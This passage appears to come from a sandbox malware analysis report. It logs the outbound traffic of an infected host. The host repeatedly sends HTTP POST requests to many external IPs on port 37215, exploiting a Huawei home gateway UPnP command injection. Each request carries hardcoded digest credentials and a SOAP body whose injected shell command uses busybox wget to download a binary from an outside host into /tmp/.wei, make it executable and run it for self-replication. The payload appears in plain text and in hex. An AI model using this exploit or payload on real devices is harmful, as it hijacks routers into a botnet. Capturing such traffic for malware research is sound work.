                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          205192.168.2.2337672157.6.201.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.151211023 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          206192.168.2.2352576197.20.142.3437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.151770115 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          207192.168.2.233944041.75.44.9237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.151870966 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          208192.168.2.2354316197.80.43.24237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.151887894 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          209192.168.2.233496240.13.193.5937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.151890039 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          210192.168.2.2337494121.184.225.20937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.152156115 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          211192.168.2.235093441.39.214.4037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.152184010 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          212192.168.2.234311241.65.151.4537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.152503967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          213192.168.2.2344358157.232.198.12237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.152513981 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          214192.168.2.2354734157.81.63.3637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.152523041 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          215192.168.2.2352844157.205.66.22337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.152771950 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
